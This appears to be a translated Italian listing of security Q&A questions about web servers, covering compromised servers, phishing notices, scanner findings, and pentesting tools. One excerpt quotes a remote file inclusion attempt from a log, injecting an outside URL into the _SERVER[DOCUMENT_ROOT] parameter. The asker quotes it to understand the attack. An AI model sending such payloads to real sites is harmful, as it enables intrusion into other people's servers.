Domande con tag 'webserver'

domande con tag
3
risposte

Attacco root del server?

Qualcuno in Ungheria ha provato qualcosa di strano di recente: /?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? Questo è l'URL parziale del mio log, che mostra la pagina a cui sono andati. Hanno dato l'URL del mio sito come referrer...
posta 06.04.2013 - 13:08
1
risposta

Quali passaggi è necessario fare per identificare il buco di sicurezza

Uso l'hosting VPS. Installato CentOS 6 e ZPanel secondo questo tutorial link Avviso ricevuto dal provider di hosting: Questo URL è stato identificato come sito di phishing ed è attualmente coinvolto in attività di furto di identità. URL: hx...
posta 23.10.2013 - 16:56
1
risposta

Come posso testare un dominio che non possiedo per vulnerabilità di comunicazione non criptate?

Sospetto che sia un sito Web che trasmette informazioni di accesso di testo in chiaro e per quanto posso dire che la connessione non è criptata. Esistono strumenti basati sul Web per convalidare / testare un sito Web per funzionalità di sicurezz...
posta 14.03.2016 - 16:21
1
risposta

La visita al localhost con il mio browser Tor riduce la mia sicurezza?

Mi capita di avere Tor in questo momento e voglio apportare una rapida modifica al mio sito web. La visita di localhost con Tor riduce la sicurezza di quella sessione?     
posta 06.07.2016 - 23:13
1
risposta

Cookie HTTPonly

Sono stato incaricato di eseguire la scansione di un laboratorio e Nessus ha restituito una vulnerabilità di "Apache HTTP Server httpOnly Cookie Information Disclosure". Quello che vorrei sapere è che cosa contengono questi cookie e come vengono...
posta 11.07.2015 - 14:23
1
risposta

Server root hackerato via httpd - conseguenze e prevenzione futura

Da prima della metà del 2014, il mio root server è stato preso di mira dagli hacker e recentemente hanno ottenuto un accesso limitato. Ho disabilitato tutti i servizi una volta capito che il server è stato compromesso e ho iniziato a indagare. S...
posta 15.02.2015 - 02:49
3
risposte

Esegui la scansione di tutti i file possibili sul server (Nome file forza bruta)

Sto cercando uno strumento in grado di analizzare tutte le possibili combinazioni di file su un server e ti dice quali nomi di file ha risposto il server. Quindi proverebbe qualcosa come: example.com/a , example.com/b , ..., example...
posta 15.01.2015 - 17:21
4
risposte

Trovare l'applicazione web sul server web che ha solo IP

Sto cercando di trovare tutte le applicazioni Web in esecuzione sul server web. L'unica informazione che ho è l'indirizzo IP del server web, ad esempio 192.168.1.100. Il mio approccio era verificare l'esistenza di applicazioni web su porte no...
posta 20.10.2017 - 17:44
2
risposte

quanto è pericoloso per il server web Windows IIS avere i privilegi di dominio

Normalmente in passato, sono riuscito a far sì che il server di produzione serva solo http (s) a Internet, ed è isolato dal suo database da un firewall che consente solo alle query del database di viaggiare. Tuttavia, ho una situazione in cui un...
posta 28.03.2011 - 21:44
1
risposta

Configurazione di socat per eseguire il pentest di un server Web remoto solo IPv6 da un host IPv4

Ho bisogno di pentestire un server web solo IPv6 situato in una rete remota dal mio host IPv4 (Kali Linux VM). Ho un tunnel 6-a-4 tra i due host (configurato usando Hurricane Electric). Sto cercando di eseguire una scansione delle vulnerabilità...
posta 31.10.2016 - 10:33